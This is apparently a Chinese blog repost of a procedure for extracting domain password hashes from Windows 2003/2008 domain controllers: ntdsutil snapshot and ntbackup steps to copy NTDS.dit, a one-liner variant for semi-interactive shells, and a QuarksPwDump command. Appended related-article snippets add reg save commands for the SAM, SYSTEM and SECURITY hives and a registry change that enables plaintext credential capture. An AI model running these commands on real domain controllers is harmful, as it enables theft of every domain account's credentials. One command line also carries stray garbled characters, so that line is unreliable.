windows 2003 windows 2008 windows 2012 导出域控hash的方法

quarkspwdump作者介绍的用法:

1. Windows 2008
   
  Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
  filesystem snapshots while the operating is running and writing to current backuped files.
   
  Here is a way to backup NTDS.dit file while a domain controller is running:
   
  #ntdsutil
  #snapshot
  #activate instance ntds
  #create
  #mount {GUID}
  #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
  #unmount {GUID}
  #quit
  #quit
   
  If AD server hasn‘t the "AD DS role", you have to use dsdbutil.exe command in the same way.
   
   
   
 2. Windows 2003  
  On this version, VSS has been implemented but not NTDS-type snapshots.
  But you can use ntbackup tool, here is the procedure:
   
  - Launch NTBACKUP gui
  - Use backup wizard (advanced)
  - Choose to save system state only and choose output filename
  - Wait some minutes
  - Use restore wizard (advanced)
  - Choise your backup, click next and use advanced button
  - Choose to restore file on another location (c:\tmp\ for example)
  - Choose to overwrite everything and next uncheck all restoration parameters
  - Validate and wait some minutes
  - Open a command shell to "c:\tmp\Active Directory"
  - We need to repair the database with this command
  #esentutl /p ntds.dit
  - Validate warning and wait some minutes
   
  ntds.dit file can now be used with quarkspwdump.

其中

#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
#unmount {GUID}
#quit
#quit

适用于可交互式或直接登录状态。

如果是半交互式的,可以采用如下方法(网上看到的用法):

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
ntdsutil  snapshot  "mount {GUID}"  quit  quit
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit
ntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  E
ntdsutil  snapshot  "delete {GUID}"  quit  quit

最后

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit
时间: 2024-10-09 07:19:41

windows 2003 windows 2008 windows 2012 导出域控hash的方法的相关文章

离线提取域控HASH的方法

1.注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可. reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security secruity.hive 本地获取 #如果要提取明文,请修改注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\Secur

Windows CSRSS API List (NT/2000/XP/2003/Vista/2008/7/2012/8)

原文地址:http://j00ru.vexillium.org/csrss_list/api_list.html http://j00ru.vexillium.org/csrss_list/api_table.html 博客园显示不完整,图片下载:http://files.cnblogs.com/files/luzhiyuan/2015-03-06.rar 说明:其中绿色为有效 Windows CSRSS API List (NT/2000/XP/2003/Vista/2008/7/2012/8

windows 2003 AD升级至windows 2012 AD

windows 2003 AD升级至windows 2012 AD 根据微软官方发布的消息:微软将于2015年07月14日停止对Windows Server 2003的服务支持,也就是说Windows Server 2003将于2015年07月14日生命周期终止.所以有很多现在还在使用Windows Server 2003的企业都将要面临系统的升级,否则一旦关键服务出现问题就会影响整个企业的运转.对于Windows Server 2003 的系统升级微软给出我们如下图所示的方案: 从上图中可以看

Windows 2003 AD升级至Windows 2012 AD之CA服务器迁移

Windows 2003 AD升级至Windows 2012 AD之CA服务器迁移 前面的博文中我们给大家介绍了如何将Windows 2003 AD升级至Windows 2012 AD以及升级后的DHCP服务器的迁移工作,今天我们就继续为大家介绍Windows 2003 AD升级至Windows 2012 AD之后的CA服务器迁移.好了废话不多说我们开始实验: 原有的CA服务器创建在Windows 2003域控制器上,域控制器迁移后,需要对CA服务器数据进行迁移.迁移的思路是把Windows 2

Windows Server 2003、2008、2012系统的安装

说在前面的话 Windows Server 2003  Windows Server 2008  和 Windows Server 2012的安装,方法,是一样的. 如何虚拟机里安装win7操作系统 如何虚拟机里安装Win8操作系统 如何虚拟机里安装Win10操作系统 安装Windows Server 2003系统 安装Windows Server 2008系统 安装Windows Server 2012系统   1.安装Windows Server 2003系统 步骤一:将Windows Se

Windows 2003 AD升级至Windows 2012 AD之DHCP服务器迁移

Windows 2003AD升级至Windows 2012AD之DHCP服务器迁移 DHCP服务器迁移原因: Windows Server 2003 将于2015年07月14日生命周期终止,微软将不再提供服务,基于此原因许多企业的域架构都将要升级到Windows Server 200 R2或者Windows Server 2012 R2(此升级我们在前面的博文中已为大家介绍),但是不知道大家是否想到一旦我们的域架构升级那么我们域架构所在服务器上所运行的服务都要随之进行一个升级或者迁移.今天我们就

windows server 2008 R2 enterprise AD域控服务器安装

前言 对于将要安装成为DC的服务器来讲,其系统配置以及基本的磁盘规划在此就不在累述了,但是关键的网络连接属性是必须要注意的.可以通过打开本地连接的属性来进行配置其IP属性.作为服务器DC的IP地址一定要是静态的IP地址,虽然不一定需要配置默认网关,但是DNS服务器指向一定要配置正确,因为AD的工作是紧密依赖于DNS服务的.本实例中整个微软网络环境都是白手起家的,考虑让这第一台DC同时充当企业网络中的DNS服务器,故需要将其首选DNS服务器地址配置为本台计算机的IP地址. 由于WIN08R2默认防

AD从windows 2003升级到windows 2008

本文以图片的方式概述从 Windows Server 2003迁移到 Windows Server 2008全过程.本文假设案例如下: 原 Domain Control情况如下: 计算机名: DC2003.itpro.local(FQDN) IP地址: 192.168.255.1/24 (DNS:192.168.255.1) 操作系统: Windows Server 2003 Enterprise Edition SP1 提供服务: Domain Control.DNS .DHCP 完成升级后,

Windows 2003 AD升级Windows 2008

把Windows 2008 R2的光盘放到主域控中,运行 adprep32 /forestPrep adprep32 /domainprep adprep32 /domainprep /gpprep adprep32 /rodcprep adprep32,用在Windows server 32位的系统中, adprep,用在Windows server 64位 ...